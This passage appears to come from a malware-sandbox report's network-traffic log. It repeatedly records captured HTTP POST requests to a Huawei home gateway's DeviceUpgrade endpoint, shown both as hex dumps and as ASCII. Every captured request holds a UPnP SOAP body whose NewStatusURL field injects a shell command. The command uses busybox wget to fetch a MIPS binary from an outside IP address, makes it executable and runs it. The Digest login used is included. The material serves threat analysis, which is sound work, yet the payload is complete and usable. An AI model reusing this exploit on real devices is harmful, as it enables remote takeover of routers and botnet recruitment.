3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 